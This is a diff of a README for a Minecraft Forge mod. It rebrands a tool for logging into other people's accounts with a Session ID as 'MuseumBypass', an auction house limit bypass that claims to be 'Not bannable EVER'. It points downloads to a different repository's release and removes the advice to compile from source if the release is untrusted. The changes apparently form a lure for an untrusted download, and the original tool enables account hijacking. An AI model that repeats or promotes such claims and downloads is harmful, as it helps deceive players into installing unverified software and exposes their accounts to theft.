tekatus/SchubiAuthV2/README.md

 <div align="center">

-# SchubiAuth
+# MuseumBypass

-**A 1.8.9 Minecraft Forge mod that allows you to login to other people's minecraft accounts using a Session ID**
+**A 1.8.9 Minecraft Forge mod that allows you to bypass the new auction house limits.**
 </div>

 ## Download
-Download from [Releases](https://github.com/Schubilegend/SchubiAuthV2/releases) and drag that into your mod folder.
+Download from [Releases](https://github.com/tekatus/MuseumBypass-1.0.0/releases/tag/hypixel) and drag that into your mod folder.

-or

-Setup and compile it yourself(if you dont trust the release).

 ## Features
-- Login into an account with a Session ID
-- Restore your original Session
-- Shows if the Session ID is valid(THIS DOES NOT WORK IF YOU HAVE PIZZA CLIENT SESSION PROTECTION ENABLED) and if the account is currently online on Hypixel
+- Bypass Auction House lmits
+- Not bannable EVER.
 - Error handling for invalid inputs
-- Allows you to change the username of the account you are logged in with (Also prevents you from accidentally changing the name of your main account)
-- Allows you to change the skin of the account you are logged in with using an url (e.g. http://assets.mojang.com/SkinTemplates/steve.png to change it to a steve skin)
 - Simple to use

 ## Disclaimer